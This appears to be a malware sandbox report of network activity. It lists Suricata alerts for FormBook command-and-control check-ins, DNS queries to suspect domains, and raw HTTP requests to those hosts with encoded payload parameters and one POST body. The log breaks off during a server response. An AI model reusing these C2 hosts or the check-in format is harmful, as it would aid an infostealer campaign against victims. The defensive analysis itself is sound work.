Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49702 -> 144.76.229.203:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49691 -> 192.186.58.31:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49727 -> 192.64.118.221:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49728 -> 192.64.118.221:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49696 -> 92.60.36.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49734 -> 198.187.31.216:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49707 -> 103.42.144.142:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49704 -> 144.76.229.203:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49694 -> 92.60.36.190:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49708 -> 103.42.144.142:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49699 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49719 -> 129.226.111.122:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49731 -> 198.187.31.216:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49724 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49725 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49697 -> 188.114.97.3:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49713 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49714 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49701 -> 144.76.229.203:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49706 -> 103.42.144.142:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49711 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49721 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49705 -> 103.42.144.142:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49729 -> 192.64.118.221:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49722 -> 84.32.84.32:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49717 -> 129.226.111.122:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49720 -> 129.226.111.122:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49732 -> 198.187.31.216:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49735 -> 47.83.1.90:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49730 -> 192.64.118.221:80
Source: Network traffic | Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.10:49716 -> 13.248.169.48:80
Source: Network traffic | Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.10:49736 -> 47.83.1.90:80
Source: DNS query: www.031235246.xyz
Source: DNS query: www.autonomousrich.xyz
Source: DNS query: www.matindi.xyz
Source: DNS query: www.ticquan.xyz
Source: DNS query: www.infiniteture.xyz
Source: Joe Sandbox View | IP Address: 144.76.229.203
Source: Joe Sandbox View | IP Address: 13.248.169.48
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (13 identical entries)
Source: global traffic | HTTP traffic detected:
    GET /15wz/?qRn=in70LLMxeJE&lJ5XsHT=piO7XCC2YmKS4YtLVhgLAvm+twzbDWYf7PZHrZKDycC9y9nN9+t6WNQPFH0EYcFR34CLkg9qv4+kt5RF0iDF94n8+IINC1ksm/whPTp+KX8FBwVFdQ== HTTP/1.1
    Host: www.lianlianzhibo.net
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /nuh1/?lJ5XsHT=PT/Ri4D8ihmWAKE0f4NA7MEkC+uLqjrnSrrDt4x1YcaGjVH70R7UhsP/yKGt9M7P52nh3xjLyG+pcovynSdH/DqF//i+itDVElBXlvbuJghBtIHpug==&qRn=in70LLMxeJE HTTP/1.1
    Host: www.sparkletime.cloud
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /3vjo/?lJ5XsHT=6k9lLSNDGifT99NSvg262I8Aatg5jOrBwRRsha+HOdKf/l5JGDaKR/CuPi+Z1+bjHWDBBIKPc/MMnzeWNqXAWT4soVq5kuG8SVyheNw+abzyJOit2w==&qRn=in70LLMxeJE HTTP/1.1
    Host: www.actpisalnplay.cyou
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /an37/?lJ5XsHT=EOo17e0b13RAPxLblUgE3vs/FGL0H2xQV++ddtKGVI4dgn5cY1anvW0mUjQ935dHimnK6XuAvySysVP8xdezbz8F+SECfhZPlRZkAyQ7l3udob86xw==&qRn=in70LLMxeJE HTTP/1.1
    Host: www.031235246.xyz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /extg/?lJ5XsHT=FWqvS2oQh4eVVjLTwqHOiP1/ZDahyJOFPrLBskdMkfQ4EQGcFlX+4xYLIEJWX9Ikcmr6BUKh66LrzwmKZjSBvM+s0cQ6GZ0SyzALVkZ6YWBvCGXcxA==&qRn=in70LLMxeJE HTTP/1.1
    Host: www.82765.ltd
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /0vxe/?lJ5XsHT=JQt81xJGwNtvop68vs3oOoN0expppVASX38FmJiMtBKjk/hrICJT6K1Qnarg/abexvbKITAwf81qmJty25MRBKLj/DljvjDldxl/RgsUrGvhCco4oQ==&qRn=in70LLMxeJE HTTP/1.1
    Host: www.autonomousrich.xyz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /76gg/?qRn=in70LLMxeJE&lJ5XsHT=f0r08WmvNyVCfCqKC3sc1J1ZeQ6U1v9y7p/LEdN+4XLKv+17b1TeDuaoBNvKJPqQeDpBKFonIAKhR62hl2Ck/TeqzhQsjPtiB1Io22jpugedkTu9gw== HTTP/1.1
    Host: www.matindi.xyz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected:
    GET /x261/?lJ5XsHT=omr8Uf0LWdGuNzd/Unp1GqS1vL4CND7gEoBxRp9qerI7RqKhJhDnpmgwn7Xoqkkia3wcWkhTca7DU/K5obCzS5GCIqNbrb3m20v/xqXHiZYqcLTRnA==&qRn=in70LLMxeJE HTTP/1.1
    Host: www.ticquan.xyz
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
    Accept-Language: en-US
    Connection: close
    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /uq6t/?qRn=in70LLMxeJE&lJ5XsHT=iD8Otn+glfhqFyVIWbF8JwloVNr+WXnKgGNoSp+HX6ROb+ECQxDeonr99y/OKnAMRMxQ6B5OBd24JHLYKUCPWyOPbLN7sXehuLdAEKYhKv+ibbMoTg== HTTP/1.1Host: www.christmas-goods.storeAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /u65q/?lJ5XsHT=pWvJsEH+VbkHT1A3bH4UYEWOlkjauqNRGqS5aYrS7rL8do5jDo02FNcjHW0uLgFLzOtKHmLLzofTR7Xd+MAlw6VIGhfkZxBWPLaHyb2WwqfekiTYeQ==&qRn=in70LLMxeJE HTTP/1.1Host: www.infiniteture.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /72e1/?lJ5XsHT=GAwPJ2y3utP2ohmBjxJQ4YKR4a5ZSZwwUjgEd0RFRLhwJQk7ldoPr0N9YZF0OFh8/8cxs0GCaqpBUanGilFHUrd1+LLzaEdk0in9+JAQ7h4qhpgqGg==&qRn=in70LLMxeJE HTTP/1.1Host: www.fluffymooncat.funAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global trafficHTTP traffic detected: GET /1hqx/?lJ5XsHT=ZLrw+Pq3MAwYsBOK5aec2k9VcgoVTWhUmUFDAd6oEVMHtXmwVeeiiz1QtAZkDwNggiXkqMWrizc2pYhIMWZKSKpIcV1JHS4R90wxBwHFuk78kAQCAA==&qRn=in70LLMxeJE HTTP/1.1Host: www.gnlokn.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USConnection: closeUser-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                Source: global traffic
                    DNS traffic detected: DNS query: www.lianlianzhibo.net
                Source: global traffic
                    DNS traffic detected: DNS query: www.sparkletime.cloud
                Source: global traffic
                    DNS traffic detected: DNS query: www.actpisalnplay.cyou
                Source: global traffic
                    DNS traffic detected: DNS query: www.031235246.xyz
                Source: global traffic
                    DNS traffic detected: DNS query: www.82765.ltd
                Source: global traffic
                    DNS traffic detected: DNS query: www.autonomousrich.xyz
                Source: global traffic
                    DNS traffic detected: DNS query: www.matindi.xyz
                Source: global traffic
                    DNS traffic detected: DNS query: www.ticquan.xyz
                Source: global traffic
                    DNS traffic detected: DNS query: www.christmas-goods.store
                Source: global traffic
                    DNS traffic detected: DNS query: www.infiniteture.xyz
                Source: global traffic
                    DNS traffic detected: DNS query: www.fluffymooncat.fun
                Source: global traffic
                    DNS traffic detected: DNS query: www.gnlokn.info
                Source: unknown
                    HTTP traffic detected: POST /nuh1/ HTTP/1.1
                    Host: www.sparkletime.cloud
                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                    Accept-Encoding: gzip, deflate
                    Accept-Language: en-US
                    Cache-Control: max-age=0
                    Content-Length: 196
                    Connection: close
                    Content-Type: application/x-www-form-urlencoded
                    Origin: http://www.sparkletime.cloud
                    Referer: http://www.sparkletime.cloud/nuh1/
                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; C6730 Build/KVT49L) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Mobile Safari/537.36
                    Data Raw: 6c 4a 35 58 73 48 54 3d 43 52 58 78 68 4f 50 41 75 42 71 36 4e 5a 30 35 66 66 59 61 6d 64 78 58 56 4f 6d 4b 39 77 6e 52 52 71 65 51 75 71 56 49 4e 4e 2b 4d 6c 56 66 65 73 79 48 55 2b 72 53 63 33 5a 75 43 78 4d 2f 50 71 6b 6d 46 31 51 7a 42 35 68 79 37 57 59 2f 4f 69 6b 6c 4c 75 68 58 4f 6f 66 6d 33 71 62 61 6b 4a 6b 55 56 31 75 33 6f 52 69 6b 33 6a 4a 48 55 37 70 49 49 5a 68 6c 39 45 56 75 6f 2b 61 50 6c 62 53 61 30 72 41 43 41 44 61 37 52 4a 46 45 30 45 36 57 7a 59 46 50 37 64 4d 58 34 32 57 34 7a 57 67 31 45 35 45 6a 4b 6f 61 59 7a 62 37 63 38 71 42 55 4f 61 61 47 69 59 59 51 78
                    Data Ascii: lJ5XsHT=CRXxhOPAuBq6NZ05ffYamdxXVOmK9wnRRqeQuqVINN+MlVfesyHU+rSc3ZuCxM/PqkmF1QzB5hy7WY/OiklLuhXOofm3qbakJkUV1u3oRik3jJHU7pIIZhl9EVuo+aPlbSa0rACADa7RJFE0E6WzYFP7dMX42W4zWg1E5EjKoaYzb7c8qBUOaaGiYYQx
                Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Mon, 10 Mar 2025 11:29:39 GMT
                    Server: Apache
                    Content-Length: 267
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 70 61 72 6b 6c 65 74 69 6d 65 2e 63 6c 6f 75 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.sparkletime.cloud Port 80</address></body></html>
                Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Mon, 10 Mar 2025 11:29:42 GMT
                    Server: Apache
                    Content-Length: 267
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 70 61 72 6b 6c 65 74 69 6d 65 2e 63 6c 6f 75 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.sparkletime.cloud Port 80</address></body></html>
                Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Mon, 10 Mar 2025 11:29:44 GMT
                    Server: Apache
                    Content-Length: 267
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 70 61 72 6b 6c 65 74 69 6d 65 2e 63 6c 6f 75 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.sparkletime.cloud Port 80</address></body></html>
                Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Mon, 10 Mar 2025 11:29:47 GMT
                    Server: Apache
                    Content-Length: 267
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 73 70 61 72 6b 6c 65 74 69 6d 65 2e 63 6c 6f 75 64 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at www.sparkletime.cloud Port 80</address></body></html>
                Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Mon, 10 Mar 2025 11:30:45 GMT
                    Server: Apache
                    Content-Length: 315
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Mon, 10 Mar 2025 11:30:47 GMT
                    Server: Apache
                    Content-Length: 315
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global traffic
                    HTTP traffic detected: HTTP/1.1 404 Not Found
                    Date: Mon, 10 Mar 2025 11:30:50 GMT
                    Server: Apache
                    Content-Length: 315
                    Connection: close
                    Content-Type: text/html; charset=iso-8859-1
